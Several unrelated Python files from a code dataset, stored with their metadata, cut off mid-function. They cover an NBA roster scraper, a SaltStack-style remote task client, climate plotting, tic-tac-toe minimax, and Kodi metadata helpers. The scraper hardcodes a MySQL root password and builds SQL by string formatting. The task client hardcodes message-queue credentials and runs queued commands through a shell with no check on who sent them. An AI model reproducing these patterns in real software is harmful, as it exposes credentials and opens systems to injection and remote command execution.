roster_links\n\ndef get_rosters(link, chromeDriver):\n browser = webdriver.Chrome(executable_path=chromeDriver)\n browser.get(link)\n team = browser.find_element_by_xpath('//*[@id=\"fittPageContainer\"]/div[3]/div[2]/div[1]/div/section/section/div[1]/h1').text.split()[:-1]\n body = browser.find_element_by_xpath('//*[@id=\"fittPageContainer\"]/div[3]/div[2]/div[1]/div/section/section/div[4]/section/table')\n\n roster_list = []\n for i in body.text.split('\\n')[1:]:\n name = []\n for p in i.split():\n if p not in ['PG', 'SG', 'SF', 'PF', 'C', 'G', 'F']:\n name.append(p)\n else:\n break\n roster_list.append([' '.join([i for i in name[1:]]), ' '.join([i for i in team])])\n browser.quit()\n return np.array(roster_list)\n\ndef extract_command(file_path):\n with open(file_path, 'r') as infile:\n return [i for i in infile.readlines()]\n\ndef gen_cmd_str(file_content):\n return ' '.join([i for i in file_content])\n\ndef gen_df(conn, sql):\n return pd.read_sql(sql=sql, con=conn)\n\ndef get_player_id(player_name, sql, conn):\n try:\n return sql_execute(sql.format(check_name(player_name)), conn)[0][0]\n except IndexError:\n return 0\n\ndef check_name(name):\n if '\\'' in name:\n name = name[:name.index('\\'')] + '\\\\' + name[name.index('\\''):]\n return name\n\ndef sql_execute(query, connection):\n exe = connection.cursor()\n exe.execute(query)\n return exe.fetchall()\n\ndef insert_into_database(conn, df):\n engine = create_engine(\"mysql+pymysql://{user}:{pw}@localhost/{db}\".format(user=\"root\", pw=\"Sk1ttles\", db=\"nba_stats_backup\"))\n df.to_sql(con=engine, name='active_rosters', if_exists='replace', index=False)\n\nif __name__ == '__main__':\n myConnection = pymysql.connect(host=\"localhost\", user=\"root\", password=\"Sk1ttles\", db=\"nba_stats_backup\", autocommit=\"true\")\n chromeDriver = '/Users/Philip/Downloads/chromedriver'\n\n truncate_table(myConnection)\n active_rosters = np.empty(shape=[0,2])\n for roster in get_roster_links()[:2]:\n active_rosters = np.concatenate([active_rosters, get_rosters(roster, chromeDriver)])\n\n rosters_df = pd.DataFrame(active_rosters, index=None, columns=['name', 'team'])\n rosters_df['player_id'] = rosters_df.loc[:, 'name'].astype(str).apply(lambda x: get_player_id(x, gen_cmd_str(extract_command(sys.argv[1])), myConnection))\n team_info_df = gen_df(myConnection, gen_cmd_str(extract_command(sys.argv[2])))\n\n active_rosters_df = pd.merge(rosters_df[rosters_df['player_id'] != 0], team_info_df, how='inner', left_on='team', right_on='team')\n insert_into_database(myConnection, active_rosters_df)\n","sub_path":"Pipeline Development/active_rosterV2.py","file_name":"active_rosterV2.py","file_ext":"py","file_size_in_byte":3448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"504840089","text":"#!usr/bin/env python\n# -*- coding:utf-8 -*-\n__author__ = 'fuzc'\n\nfrom conf import configs\nfrom modules import files\nimport pika\nimport platform #为获取操作系统类型\nimport subprocess\nimport json, threading\n\nclass CommandManagement(object):\n '''\n 客户端输入命令解析\n '''\n def __init__(self, argvs):\n self.argvs = argvs[1:]\n self.argv_handler()\n\n def argv_handler(self):\n if len(self.argvs) == 0:\n exit(\"\\033[31;1mError:Need argumemt: start\\stop\\033[0m\")\n if hasattr(self,self.argvs[0]):\n func = getattr(self,self.argvs[0]) #获取start or stop方法\n func() #执行start or stop方法\n else:\n exit(\"Invalid argument\")\n\n def start(self):\n '''\n 客户端命令执行开始函数\n :return:\n '''\n client_obj = SaltClient() #创建类的对象\n client_obj.listen()\n\n def stop(self):\n pass\n\nclass TaskHandle(object):\n def __init__(self, main_obj, task_body):\n self.main_obj = main_obj\n self.task_body = json.loads(task_body.decode())\n\n def processing(self):\n '''\n process task\n :return:\n '''\n check_res = self.check_data_validation() #检查数据的有效性\n if check_res:\n self.current_os_type, data = check_res\n self.parse_task_data(self.current_os_type, data)\n\n def task_callback(self,callback_queue,callback_data):\n '''\n 把执行结果返回给服务器\n :param callback_queue:\n :param callback_data:\n :return:\n '''\n data = {\n 'client_id':self.main_obj.client_id,\n 'data': callback_data\n }\n\n #声明queue\n self.main_obj.mq_channel.queue_declare(queue=callback_queue)\n self.main_obj.mq_channel.basic_publish(exchange='',\n routing_key=callback_queue,\n body=json.dumps(data))\n print(\" [x] Sent task callback to [%s] \" % callback_queue)\n\n def parse_task_data(self,os_type,data):\n '''\n 解析任务数据并执行;\n 涉及到data中配置中不同子任务section之间的依赖,采取的方法是如果已经执行的section放入applied_list列表中,如果依赖关系没有形成死循环,则每次循环至少有一个section被执行,所以比较上一次和这次执行后appliend_list的长度,如果相等则代表section之间依赖关系形成死锁或者section均被执行完毕\n :param os_type:\n :param data:\n :return:\n '''\n applied_list = [] #所有已经执行的子任务(section)都放在此列表里\n applied_result = [] #把所有子任务section的执行结果放在此列表\n last_loop_section_set_len = len(applied_list)\n while True:\n for section_data in data:\n if section_data.get('called_flag'): #代表data中已经执行的section\n print(\"\\033[34;1mcalled already\\033[0m\".center(60,'-'))\n else:\n apply_status, result = self.apply_section(section_data)\n if apply_status == True:#代表执行成功\n applied_list.append(section_data)\n applied_result += result\n\n if last_loop_section_set_len == len(applied_list):\n #此两变量相等,代表2种可能,要么都执行完了,要么section之间的依赖关系形成了反锁,退出循环\n print('\\033[34;1mparse task done\\033[0m'.center(60, '*'), len(applied_list), last_loop_section_set_len)\n print('\\033[35;1mapplied_list\\033[0m',applied_list)\n print('\\033[35;1mapplied_result\\033[0m',applied_result)\n break\n last_loop_section_set_len = len(applied_list)\n #下面则把执行结果返回给服务器\n print(\"\\033[42;1msend task result to callback queue:\\033[0m\",self.task_body['callback_queue'])\n self.task_callback(self.task_body['callback_queue'],applied_result)\n\n def check_pre_requirites(self, conditions):\n '''\n 检查依赖条件是否满足\n :param conditions:\n :return:\n '''\n print('\\033[35;1mcheck pre requisites\\033[0m'.center(60,'-'))\n conditions_result = []\n for condition in conditions:\n #print(condition)\n cmd_res = subprocess.run(condition,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n conditions_result.append(int(cmd_res.stdout.decode().strip()))\n\n print(\"\\033[41;1mcmd_res:\\033[0m\",conditions_result)\n return sum(conditions_result)\n\n def run_cmds(self, cmd_list):\n '''\n 运行命令,返回结果\n :param cmd_list:\n :return:\n '''\n cmd_results = []\n for cmd in cmd_list:\n # print (cmd)\n cmd_res = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n cmd_results.append([cmd_res.returncode, cmd_res.stderr.decode()])\n\n print('\\033[41;1mcmd res:\\033[0m',cmd_results)\n return cmd_results #若所有命令执行成功,则返回为0\n\n def apply_section(self, section_data):\n '''\n 执行指定的section\n :param section_data:\n :return:\n '''\n print(\"\\033[32;1mapplying section data\\033[0m\".center(50,'-'))\n if section_data['require_list'] != None:\n #检查依赖require条件是否满足\n if self.check_pre_requirites(section_data['require_list']) == 0: #依赖条件满足,此处需要依赖条件中的命令在os中执行返回0为满足,返回1为不满足\n if section_data.get('file_module') == True: #文档文件单独处理\n res = self.file_handle(section_data)\n else:\n res = self.run_cmds(section_data['cmd_list'])\n section_data['called_flag'] = True\n return [True, res]\n else:\n print(\"\\033[33;1m依赖不满足\\033[0m\")\n return [False, None]\n else:#没依赖关系直接执行\n if section_data.get('file_module') == True: # 文档文件单独处理\n res = self.file_handle(section_data)\n else:\n res = self.run_cmds(section_data['cmd_list'])\n section_data['called_flag'] = True\n return [True, res]\n\n def file_handle(self, section_data):\n '''\n 对文件进行操作\n :param section_data:\n :return:\n '''\n file_module_obj = files.FileModule(self)\n file_module_obj.process(section_data)\n return []\n\n def check_data_validation(self):\n '''\n 检查数据的有效性,确保服务器发来的任务是在本客户端可以执行\n :return:\n '''\n #print('-----parse task-----')\n os_version = platform.version().lower() #获取客户端系统的版本信息\n\n for os_type,data in self.task_body['data'].items():\n #print(os_version, os_type)\n if os_type in os_version:\n return os_type, data\n else:\n print(\"\\033[31;1msalt is not supported on this os \\033[0m\", os_version)\n\nclass SaltClient(object):\n def __init__(self):\n self.configs = configs\n self.make_connection()\n self.client_id = self.get_needle_id()\n self.task_queue_name = \"TASK_Q_%s\" % self.client_id #client queue\n\n def make_connection(self):\n '''\n mq建立连接方法;需设置客户端用户名和密码访问权限,且需在MQ中增加此用户名和密码,并设置权限\n :return:\n '''\n credentials = pika.PlainCredentials('fuzc','fuzc1234') #mq访问权限设置\n self.mq_conn = pika.BlockingConnection(pika.ConnectionParameters(configs.MQ_CONN['host'],\n configs.MQ_CONN['port'],'/',credentials))\n self.mq_channel = self.mq_conn.channel()\n\n def get_needle_id(self):\n '''\n 应去服务器中取自己客户端的id\n 此处暂时偷懒做法--取configs自定义的一个id\n :return:\n '''\n return configs.SALT_CLIENT_ID\n\n def listen(self):\n '''\n 开始监听服务器的call\n :return:\n '''\n self.msg_consume()\n\n def start_thread(self, task_body):\n print('\\033[35;1m start a thread to process task\\033[0m')\n task = TaskHandle(self, task_body)\n task.processing()\n\n def msg_callback(self, ch, method, properties, body):\n print(\" \\033[34;1m[x] Received a task msg.\\033[0m \")\n thread = threading.Thread(target=self.start_thread, args=(body,)) #启动一个进程处理MQ中的命令\n thread.start()\n\n def msg_consume(self):\n '''\n 客户端监听\n :return:\n '''\n self.mq_channel.queue_declare(queue=self.task_queue_name)\n\n self.mq_channel.basic_consume(self.msg_callback,\n queue=self.task_queue_name,\n no_ack=True)\n\n print(\" [%s] Waiting for messages. To exit press CTRL+C\" % self.task_queue_name)\n\n self.mq_channel.start_consuming()\n","sub_path":"saltstack/saltclient/core/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"444033304","text":"\"\"\" Utiltity functions for models\"\"\"\nimport os\n\nfrom ulmo.ood import ood\n\nsst_path = '/Volumes/Aqua-1/MODIS/uri-ai-sst/OOD' if os.getenv('SST_OOD') is None else os.getenv('SST_OOD')\n\nmodel_path = os.path.join(sst_path, 'Models')\n\ndef load(mtype):\n # Load up the model\n if mtype == 'standard':\n datadir = os.path.join(model_path, 'R2019_2010_128x128_std')\n filepath = 'PreProc/MODIS_R2019_2010_95clear_128x128_preproc_std.h5'\n pae = ood.ProbabilisticAutoencoder.from_json(datadir + '/model.json',\n datadir=datadir,\n filepath=filepath,\n logdir=datadir)\n else:\n raise IOError(\"Not ready for mtype={}\".format(mtype))\n pae.load_autoencoder()\n pae.load_flow()\n\n # Return\n return pae\n","sub_path":"ulmo/utils/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"342297840","text":"#!/usr/bin/env python3\n\ncoins = [100,25,10,5,1]\n\ndef change(target):\n if target == 0:\n return []\n useful_coins = list(reversed(sorted([coin for coin in coins if coin <= target])))\n print(useful_coins)\n total = 0\n i = 0\n used_coins = []\n while total != target and i < len(useful_coins):\n prospective = total + useful_coins[i]\n if prospective <= target:\n used_coins.append(useful_coins[i])\n total = prospective\n else:\n i = i + 1\n if total == target:\n return used_coins\n else:\n return None\n\nprint(change(15))\n","sub_path":"python/coin_change2.py","file_name":"coin_change2.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"372299047","text":"import math\nimport copy\n\nX = \"X\"\nO = \"O\"\nEMPTY = None\n\n\ndef initial_state():\n \"\"\"\n Returns starting state of the board.\n \"\"\"\n return [[EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY],\n [EMPTY, EMPTY, EMPTY]]\n\n\ndef player(board):\n \"\"\"\n Returns player who has the next turn on a board.\n \"\"\"\n if (any(EMPTY in row for row in board)):\n numX = sum(row.count(X) for row in board)\n numO = sum(row.count(O) for row in board)\n\n if (numO == numX):\n return X\n else:\n return O\n else:\n return \n #raise NotImplementedError\n\n\ndef actions(board):\n \"\"\"\n Returns set of all possible actions (i, j) available on the board.\n \"\"\"\n poss = set()\n flag = 0\n for i in range(3):\n for j in range(3):\n if (board[i][j] == EMPTY):\n flag = 1\n #s = str(i)+str(j)\n poss.add((i,j))\n\n if (flag==0):\n return -1\n else:\n return poss\n #raise NotImplementedError\n\n\ndef result(board, action):\n \"\"\"\n Returns the board that results from making move (i, j) on the board.\n \"\"\"\n newBoard = copy.deepcopy(board)\n i, j = action\n if (newBoard[i][j] != EMPTY):\n raise Exception(\"Not possible\")\n else:\n turn = player(newBoard)\n newBoard[i][j] = turn\n return newBoard\n #raise NotImplementedError\n\n\ndef winner(board):\n \"\"\"\n Returns the winner of the game, if there is one.\n \"\"\"\n # if matches all rows\n for i in range(3):\n if (board[i].count(X) == 3):\n return X\n elif (board[i].count(O) == 3):\n return O\n \n # for all columns\n for i in range(3):\n if (board[0][i] == board[1][i] == board[2][i] == X):\n return X\n elif (board[0][i] == board[1][i] == board[2][i] == O):\n return O\n\n # for main diagonal \n flagX = 0\n flagO = 0\n for i in range(3):\n if (board[i][i] == X):\n flagX += 1\n elif (board[i][i] == O):\n flagO += 1\n if (flagX == 3):\n return X\n elif (flagO == 3):\n return O\n \n #for anti diagonal\n flagO = 0\n flagX = 0\n for i in range(3):\n if (board[i][3-i-1] == X):\n flagX += 1\n elif (board[i][3-i-1] == O):\n flagO += 1\n if (flagX == 3):\n return X\n elif (flagO == 3):\n return O\n \n return None\n #raise NotImplementedError\n\n\n\ndef terminal(board):\n \"\"\"\n Returns True if game is over, False otherwise.\n \"\"\"\n if (winner(board)!=None):\n return True\n \n fill = 0\n for i in range(3):\n for j in range(3):\n if (board[i][j] != EMPTY):\n fill += 1\n\n if (fill == 9):\n return True\n else:\n return False\n\n # raise NotImplementedError\n\n\ndef utility(board):\n \"\"\"\n Returns 1 if X has won the game, -1 if O has won, 0 otherwise.\n \"\"\"\n w = winner(board)\n if (w == X):\n return 1\n elif (w == O):\n return -1\n else:\n return 0\n\n # raise NotImplementedError\n\n\ndef minimax(board):\n \"\"\"\n Returns the optimal action for the current player on the board.\n \"\"\"\n if (terminal(board) == True):\n return None\n elif (player(board) == X):\n best = -2\n bestMove = tuple()\n moves = actions(board)\n for move in moves:\n move_val = MIN(result(board,move))\n if (move_val == 1):\n return move\n elif (move_val > best):\n best = move_val\n bestMove = move\n return bestMove\n elif (player(board) == O):\n best = 2\n bestMove = tuple()\n moves = actions(board)\n for move in moves:\n move_val = MAX(result(board,move))\n if (move_val == -1):\n return move\n elif (move_val < best):\n best = move_val\n bestMove = move\n return bestMove\n # raise NotImplementedError\n\ndef MAX(board):\n if (terminal(board) == True):\n return utility(board)\n \n m = -2\n moves = actions(board)\n for move in moves:\n m = max(m, MIN(result(board,move)))\n if (m == 1):\n return m\n return m\n\n\ndef MIN(board):\n if (terminal(board) == True):\n return utility(board)\n \n m = 2\n moves = actions(board)\n for move in moves:\n m = min(m, MAX(result(board,move)))\n if (m==-1):\n return m\n return m","sub_path":"src/ttt.py","file_name":"ttt.py","file_ext":"py","file_size_in_byte":4521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"352444618","text":"\"\"\"\nCheck equilibration time of model using the vertically averaged overturning circulation strength. 2/05/2018\n1) Check if model is spun up by looking at first 5 years of data\n2) Check model response time to a sudden shift in insolation using second 5 years\n\n\"\"\"\n\nimport xarray as xr\nimport sh\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom pylab import rcParams\nfrom hadley_cell import mass_streamfunction\nfrom data_handling_updates import cell_area, gradients as gr\nimport sys\nimport statsmodels.api as sm\nfrom climatology import precip_centroid\n\ndef sf_spinup(run, months_list, filenames=['plev_pentad']):\n \n # Function to open files for a specfied month range and filename.\n def open_files(run, months, filename):\n name_temp = '/disca/share/rg419/Data_moist/' + run + '/run%04d/'+filename+'.nc'\n names = [name_temp % m for m in range( months[0], months[1]) ]\n data = xr.open_mfdataset( names, decode_times=False, chunks={'time': 30})\n # Reduce dataset so that only vcomp is retained\n data = xr.Dataset({'vcomp': data.vcomp, 'precipitation':data.precipitation}, coords=data.vcomp.coords) \n #data.coords['month'] = data.time//30 + 1 \n #data = data.groupby('month').mean(('time'))\n return data\n \n arrays = []\n i=0\n for filename in filenames:\n data = open_files(run, months_list[i], filename)\n arrays.append(data)\n i=i+1 \n data = xr.concat(arrays, dim='time')\n \n precip_centroid(data)\n adj_time = np.min(data.p_cent.time.where(data.p_cent >= 15.,drop=True).values) \n \n return data.p_cent, adj_time\n\n\n# Set plotting directory\nplot_dir = '/scratch/rg419/plots/paper_2_figs/'\nmkdir = sh.mkdir.bake('-p')\nmkdir(plot_dir)\n\n\n#sf_spinup('ss_eq_20', [[1,61]], filenames=['plev_monthly'])\n#psi_sst, adj_time = sf_spinup('ss_eq_sst', [[1,61],[61,121]], filenames=['plev_monthly','plev_pentad'])\npcent_sst, adj_time_sst = sf_spinup('ss_eq_sst', [[61,121]], filenames=['plev_pentad'])\nprint('sst')\npcent_sst_zs, adj_time_sst_zs = sf_spinup('ss_eq_sst_zs', [[61,121]], filenames=['plev_pentad'])\nprint('sst_zs')\npcent_2p5, adj_time_2p5 = sf_spinup('ss_eq_2.5', [[61,121]], filenames=['plev_pentad'])\nprint('2.5')\npcent_5, adj_time_5 = sf_spinup('ss_eq_5', [[61,121]], filenames=['plev_pentad'])\nprint('5')\npcent_10, adj_time_10 = sf_spinup('ss_eq_10', [[61,121]], filenames=['plev_pentad'])\nprint('10')\npcent_15, adj_time_15 = sf_spinup('ss_eq_15', [[61,121]], filenames=['plev_pentad'])\nprint('15')\npcent_20, adj_time_20 = sf_spinup('ss_eq_20', [[61,121]], filenames=['plev_pentad'])\nprint('20')\n\n\n# Set figure parameters\nrcParams['figure.figsize'] = 5, 6\nrcParams['font.size'] = 16\n\nfig, (ax1, ax2) = plt.subplots(2)\n\nsst_zs, = ax1.plot(pcent_sst_zs.time-1800., pcent_sst_zs,'y')\nsst, = ax1.plot(pcent_sst.time-1800., pcent_sst,'m')\nm25, = ax1.plot(pcent_2p5.time-1800., pcent_2p5, 'b', label='2.5')\nm5, = ax1.plot(pcent_5.time-1800., pcent_5, 'g', label='5.')\nm10, = ax1.plot(pcent_10.time-1800., pcent_10, 'k', label='10.')\nm15, = ax1.plot(pcent_15.time-1800., pcent_15, 'r', label='15.')\nm20, = ax1.plot(pcent_20.time-1800., pcent_20, 'c', label='20.')\nax1.set_ylabel('Precipitation centroid')\nax1.set_xlabel('Time, days')\nax1.set_xlim([0,1000])\nax1.set_ylim([-2.5,25])\nax1.set_yticks(range(0,26,5))\nax1.grid(True,linestyle=':')\nlegend = ax1.legend([m25,m5,m10,m15,m20,sst,sst_zs], ['2.5','5.','10.','15.','20.','SST','SST (ZS)'], loc='lower right', fontsize=8, title='MLD, m', ncol=2) #, ,#bbox_to_anchor=(1.05, 1),\n#legend = ax1.legend([sst,sst_zs], ['SST','SST (ZS)'], loc='lower right', fontsize=8) #, ,#bbox_to_anchor=(1.05, 1),\nlegend.get_title().set_fontsize(8)\n\nmlds = np.array([2.5,5.,10.,15.,20.])\nadj_time_all = np.array([adj_time_2p5, adj_time_5, adj_time_10, adj_time_15, adj_time_20]) - 1800.\n\nA = np.array([ mlds, np.ones(mlds.shape) ])\n\nmodel = sm.OLS(adj_time_all, A.T)\nresult=model.fit()\nconsts = result.params\nstd_err = result.bse\n \nprint('=== Coeffs ===')\nprint(consts[0], consts[1])\nprint('=== Std Errs ===')\nprint(2*std_err[0], 2*std_err[1])\n\nplt.plot(mlds, adj_time_all, 'xk', mew=2, ms=10)\nplt.plot(mlds, mlds * consts[0] + consts[1],'k')\nax2.set_ylabel('Response time, days')\nax2.set_xlabel('Mixed layer depth, m')\nax2.grid(True,linestyle=':')\nax2.set_yticks(range(200,801,200))\n\nplt.subplots_adjust(left=0.15, right=0.95, top=0.95, bottom=0.1, hspace=0.3)\n\nplt.savefig(plot_dir + 'eq_time.pdf', format='pdf')\nplt.close()","sub_path":"paper_2_figs/equm_time.py","file_name":"equm_time.py","file_ext":"py","file_size_in_byte":4490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"227227993","text":"import re\nimport copy\nimport urllib\nimport json\nfrom meta import plugin, import_tmdb, LANG\nfrom meta.navigation.base import get_background_path\nfrom meta.utils.text import parse_year, to_utf8\n\ndef get_movie_metadata(movie, genres_dict=None):\n info = {}\n info['title'] = movie['title']\n info['year'] = parse_year(movie['release_date'])\n info['name'] = u'%s (%s)' % (info['title'], info['year'])\n info['premiered'] = movie['release_date']\n info['rating'] = movie['vote_average']\n info['votes'] = movie['vote_count']\n info['plot'] = movie['overview']\n info['originaltitle'] = movie['original_title']\n info['tmdb'] = str(movie['id'])\n if movie['poster_path'] and movie['poster_path'] != None and movie['poster_path'] != \"\": info['poster'] = u'%s%s' % ('http://image.tmdb.org/t/p/w500', movie['poster_path'])\n else: info['poster'] = \"https://raw.githubusercontent.com/OpenELEQ/Style/master/MetalliQ/default/unavailable.png\"\n if movie['backdrop_path'] and movie['backdrop_path'] != None and movie['backdrop_path'] != \"\": info['fanart'] = u'%s%s' % ('http://image.tmdb.org/t/p/original', movie['backdrop_path'])\n else: info['fanart'] = get_background_path()\n try: info['genre'] = u' / '.join([x['name'] for x in movie['genres']])\n except KeyError:\n if genres_dict: \n try: info['genre'] = u' / '.join([genres_dict[x] for x in movie['genre_ids']])\n except: info['genre'] = ''\n return info\n\ndef get_trakt_movie_metadata(movie, genres_dict=None):\n info = {}\n info['title'] = movie['title']\n info['year'] = movie['year']\n info['name'] = u'%s (%s)' % (info['title'], info['year'])\n info['premiered'] = movie.get('released')\n info['rating'] = movie.get('rating')\n info['votes'] = movie.get('votes')\n info['tagline'] = movie.get('tagline')\n info['plot'] = movie.get('overview')\n info['duration'] = 60 * (movie.get('runtime') or 0)\n info['mpaa'] = movie.get('certification')\n info['playcount'] = movie.get('plays')\n if not info['playcount'] and movie.get('watched'): info['playcount'] = 1\n info['tmdb'] = movie['ids'].get('tmdb')\n info['trakt_id'] = movie['ids'].get('trakt_id')\n info['imdb_id'] = movie['ids'].get('imdb')\n if info['tmdb'] == None: info['tmdb'] = \"\"\n if info['trakt_id'] == None: info['trakt_id'] = \"\"\n if info['imdb_id'] == None: info['imdb_id'] = \"\"\n images = item_images(\"movie\", tmdb_id=info['tmdb'], imdb_id=info['imdb_id'], name=info['title'])\n info['poster'] = images[0]\n info['fanart'] = images[1]\n if genres_dict: info['genre'] = u' / '.join([genres_dict[x] for x in movie['genres']])\n if movie.get('trailer'): info['trailer'] = make_trailer(movie['trailer'])\n if not info['playcount'] and movie.get('watched'): info['playcount'] = 1\n return info\n\ndef make_trailer(trailer_url):\n match = re.search('\\?v=(.*)', trailer_url)\n if match: return 'plugin://plugin.video.youtube/?action=play_video&videoid=%s' % (match.group(1))\n\ndef get_tvshow_metadata_trakt(show, genres_dict=None):\n info = {}\n info['title'] = show['title']\n info['year'] = show['year']\n info['name'] = u'%s (%s)' % (info['title'], info['year'])\n info['tvshowtitle'] = info['title']\n info['premiered'] = show.get('released')\n info['rating'] = show.get('rating')\n info['votes'] = show.get('votes')\n info['tagline'] = show.get('tagline')\n info['plot'] = show.get('overview')\n info['duration'] = 60 * (show.get('runtime') or 0)\n info['studio'] = show.get('network','')\n info['mpaa'] = show.get('certification')\n info['playcount'] = show.get('plays')\n if not info['playcount'] and show.get('watched'): info['playcount'] = 1\n info['tmdb'] = show['ids'].get('tmdb')\n info['trakt_id'] = show['ids'].get('trakt_id')\n info['imdb_id'] = show['ids'].get('imdb')\n info['tvdb_id'] = show['ids'].get('tvdb')\n if info['tmdb'] == None: info['tmdb'] = \"\"\n if info['trakt_id'] == None: info['trakt_id'] = \"\"\n if info['imdb_id'] == None: info['imdb_id'] = \"\"\n if info['tvdb_id'] == None: info['tvdb_id'] = \"\"\n images = item_images(\"tv\", tmdb_id=info['tmdb'], imdb_id=info['imdb_id'], tvdb_id=info['tvdb_id'], name=info['title'])\n info['poster'] = images[0]\n info['fanart'] = images[1]\n if genres_dict: info['genre'] = u\" / \".join([genres_dict[x] for x in show['genres']])\n if show.get('trailer'): info['trailer'] = make_trailer(show['trailer'])\n if not info['playcount'] and show.get('watched'): info['playcount'] = 1\n return info\n\ndef get_tvshow_metadata_tvdb(tvdb_show, banners=True):\n info = {}\n if tvdb_show is None: return info\n if tvdb_show['genre']:\n if '|' in tvdb_show['genre']: genres = tvdb_show['genre'].replace('|',' / ')\n info['genre'] = genres[3:-3]\n info['tvdb_id'] = str(tvdb_show['id'])\n info['name'] = tvdb_show['seriesname']\n info['title'] = tvdb_show['seriesname']\n info['tvshowtitle'] = tvdb_show['seriesname']\n info['originaltitle'] = tvdb_show['seriesname']\n info['plot'] = tvdb_show.get('overview', '')\n if banners: info['poster'] = tvdb_show.get_poster(language=LANG)\n info['fanart'] = tvdb_show.get('fanart', '')\n info['rating'] = tvdb_show.get('rating')\n info['votes'] = tvdb_show.get('ratingcount')\n info['year'] = tvdb_show.get('year', 0)\n info['studio'] = tvdb_show.get('network','')\n info['imdb_id'] = tvdb_show.get('imdb_id', '')\n return info\n\ndef get_tvshow_metadata_tmdb(show, genres_dict=None):\n info = {}\n if show is None: return info\n if 'id' in show: info['tmdb'] = str(show['id'])\n info['name'] = show['name']\n info['title'] = show['name']\n info['tvshowtitle'] = show['original_name']\n info['originaltitle'] = show['original_name']\n info['plot'] = show['overview']\n info['rating'] = str(show['vote_average'])\n info['votes'] = str(show['vote_count'])\n try: info['genre'] = u' / '.join([x['name'] for x in show['genres']])\n except KeyError:\n if genres_dict:\n try: info['genre'] = u' / '.join([genres_dict[x] for x in show['genre_ids']])\n except: info['genre'] = ''\n if show['poster_path']: info['poster'] = u'%s%s' % ('http://image.tmdb.org/t/p/w500', show['poster_path'])\n else: info['poster'] = \"https://raw.githubusercontent.com/OpenELEQ/Style/master/MetalliQ/default/unavailable.png\"\n if show['backdrop_path']: info['fanart'] = u'%s%s' % ('http://image.tmdb.org/t/p/original', show['backdrop_path'])\n else: info['fanart'] = get_background_path()\n return info\n\ndef get_tvshow_metadata_tvmaze(show):\n info = {}\n if show is None: return info\n if show['externals']['thetvdb'] is not None: info['id'] = show['externals']['thetvdb']\n if show['externals']['imdb'] is not None: info['imdb'] = show['externals']['imdb']\n info['name'] = show['name']\n info['title'] = show['name']\n info['tvshowtitle'] = show['name']\n info['originaltitle'] = show['name']\n info['plot'] = re.sub(r'\\<[^)].*?\\>', '', show['summary']).replace(\"&\",\"&\").replace(\"\\t\",\"\")\n info['rating'] = str(show['rating']['average'])\n info['votes'] = str(show['weight'])\n info['genre'] = show['type']\n if show['image']['original']: info['poster'] = show['image']['original']\n info['fanart'] = get_background_path()\n return info\n\ndef get_season_metadata_tvdb(show_metadata, season, banners=True):\n info = copy.deepcopy(show_metadata)\n del info['title']\n info['season'] = season.num\n if banners: info['poster'] = season.get_poster(language=LANG)\n return info\n\ndef get_season_metadata_tmdb(show_metadata, season):\n info = copy.deepcopy(show_metadata)\n del info['name']\n info['season'] = season['season_number']\n if season['images']['posters']: info['poster'] = season['images']['posters'][0]\n if show_metadata['fanart']: info['fanart'] = show_metadata['fanart']\n else: info['fanart'] = \"\"\n return info\n\ndef get_season_metadata_trakt(show_metadata, season, banners=True):\n info = copy.deepcopy(show_metadata)\n del info['title']\n info['season'] = season['number']\n if not info['playcount'] and season.get('watched'): info['playcount'] = 1\n return info\n\ndef get_season_metadata_tvmaze(show_metadata, season):\n info = copy.deepcopy(show_metadata)\n del info['name']\n info['season'] = season['number']\n info['fanart'] = get_background_path()\n return info\n\ndef get_episode_metadata_tvdb(season_metadata, episode, banners=True):\n info = copy.deepcopy(season_metadata)\n info['episode'] = episode.get('episodenumber')\n info['title'] = episode.get('episodename','')\n info['aired'] = episode.get('firstaired','')\n info['premiered'] = episode.get('firstaired','')\n info['rating'] = episode.get('rating', '')\n info['plot'] = episode.get('overview','')\n info['plotoutline'] = episode.get('overview','')\n info['votes'] = episode.get('ratingcount','')\n if banners: info['poster'] = episode['filename']\n return info\n\ndef get_episode_metadata_tmdb(season_metadata, episode):\n info = copy.deepcopy(season_metadata)\n if episode == None or episode == \"\" or \"status_code\" in str(episode): return info\n info['episode'] = episode['episode_number']\n info['title'] = episode['name']\n info['aired'] = episode['air_date']\n info['premiered'] = episode['air_date']\n info['rating'] = episode['vote_average']\n info['plot'] = episode['overview']\n info['plotoutline'] = episode['overview']\n info['votes'] = episode['vote_count']\n if episode['still_path']: info['poster'] = u'%s%s' % ('http://image.tmdb.org/t/p/w500', episode['still_path'])\n elif season_metadata['poster']: info['poster'] = u'%s%s' % ('http://image.tmdb.org/t/p/w500', season_metadata['poster'])\n else: info['poster'] = ''\n if season_metadata['fanart']: info['fanart'] = season_metadata['fanart']\n else: info['fanart'] = ''\n return info\n\ndef get_episode_metadata_trakt(season_metadata, episode):\n info = copy.deepcopy(season_metadata)\n info['episode'] = episode.get('number')\n info['title'] = episode.get('title','')\n info['aired'] = episode.get('first_aired','')\n info['premiered'] = episode.get('first_aired','')\n info['rating'] = episode.get('rating', '')\n info['plot'] = episode.get('overview','')\n info['plotoutline'] = episode.get('overview','')\n info['votes'] = episode.get('votes','')\n if not info['playcount'] and episode.get('watched'): info['playcount'] = 1\n return info\n\ndef get_episode_metadata_tvmaze(season_metadata, episode):\n info = copy.deepcopy(season_metadata)\n if episode == None or episode == \"\": return info\n info['episode'] = episode['number']\n info['season'] = episode['season']\n info['title'] = episode['name']\n info['aired'] = episode['airdate']\n info['premiered'] = episode['airdate']\n info['plot'] = re.sub(r'\\<[^)].*?\\>', '', str(episode['summary'])).replace(\"&\",\"&\").replace(\"\\t\",\"\")\n info['plotoutline'] = 